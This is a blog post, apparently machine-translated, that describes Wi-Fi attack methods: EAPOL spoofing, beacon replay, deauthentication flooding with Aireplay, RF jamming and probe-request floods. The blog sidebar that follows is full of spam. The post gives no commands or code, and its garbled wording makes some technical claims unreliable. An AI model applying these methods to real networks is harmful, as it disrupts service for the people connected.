However, there are only authentication value at the beginning of the official client communication with the AP. Furthermore, if already connected, EAPOL protocol did not appear again, except during the next 10 thousand packages appeared. A hacker can send (injection) EAPOL packet containing the result of spoofing spoofing addresses that have been harmonized SSID, MAC Address and IP Address of the source / destination.
Official client sends EAPOL packet to get a response from the AP for authentication process. Furthermore, the AP will check to see ID Card from the client. Attacker using the protocol weakness by creating a fake ID card in order to be allowed entry by the AP and get a number to enter the same room.
8.2 Beacon Management.
Beacon Management is one type of protocol used by each AP to transmit RF signals to preach the existence of AP. When done Beacon protocol capture and decode it, would get the fact that in each of his transmision rate, Beacon management sent some information, such as SSID, encryption type, channel, MAC Address, and Iain, Iain.
Weakness (vulnerability) that can be used from this type of protocol is as follows. An attacker will capture client management package Beacon emitted by the AP. Furthermore, the attacker client will transmit back to the Beacon management package. Typically, the value of Beacon emitted by AP for 100ms. If the attacker caught Beacon client AP, then re-emit the Beacon, Beacon 2 will be the same. Source senders different, but contains the same information. This means that there are two APs the same SSID contains information, MAC Address, the same. As a result, the client can not communicate with the actual AP, unless the attacker to stop sending such a package Beacon.
8.3 Deauthentkation / Disassociation Protocol
The term commonly used to take advantage of this gap is called the protocol Deauthentication Broadcast Attack. This attack will flood the packet Deauthentication WLAN with wireless service so screwed up in the client. This type of attack is the most dangerous attack because it would break the connection target client or the client is associated with AP Attacker disconnection request by utilizing Deauthentication / Disassociation a direct response by the AP. If there is an ISP company affected by this attack, it will be a lot of complaints from customers due to rupture the entire client network.
Applications that can be used for this attack is Aireplay. Here is an example of applications of work being done Aircrak Broadcast Deauthentication Attack.
8.4 RF Signal Jamming
RF signals are electromagnetic waves that are used to exchange information over the air from one node to another node. Currently, the RF signals are widely used, such as for transmitting FM radio waves, television waves, or as a means of sending data over wireless networks.
RF signals have the advantage, but also has weaknesses. RF signals easily disturbed by RF-based systems other external, such as cordless phones, microwaves, Bluetooth devices, and Iainnya. When these devices are used simultaneously, the performance of wireless networks can be decreased significantly because of competition in the use of the same medium. In the end, such interference can cause errors in the bits of information that is being sent so that there re-transmission and delay to the user.
8.5 Probe-Request Management
When the first client attempts to connect itself with the AP, the AP will respond to the probe, to check whether the client request to enter the wireless network are allowed or not. Gap which can be used by the attacker is to manipulate the probe packet-respond. Next, the attacker made a request-respond probes. If the request is done by sending a request as much as possible, for example, 500 packets in 1 second, the AP will not be able to respond to the package so much. That is, AP no longer able to communicate with other clients.
skip to main |
skip to sidebar
![[Valid Atom 1.0]](valid-atom.png "Validate my Atom 1.0 feed")
to control one-third part of this world, you need a science of chemical engineering, not the troopsso
klik HERE to join us, and you will know its usefulness in the future later.
remember this, you give time's and i'll give you world.
FREE SHARE YOUR WEBSITE OR BLOGS AT HERE
alexa
add ur url here
Buy Reviews
ask2link
traffic generator
sitemeter
hkbuzz
trekpay
trek advertising
nomincashout
entre-card
Promote for free
AddMeGet
paid through PayPal
buy text links with ask2link
easy cash blogging
inter-admedia
micro-workers
cb-click-bank
CASH for surfing
share website or blogs
promote burner
free search engine
MY_BLOGROLL at HERE
Chemical Engineering Plants Design
Online Business
homes in the next future
Segalanya Tentang Dunia IT
rahasia seorang pria
investment
entertaint
0 komentar:
Posting Komentar
pleas share your informations with me..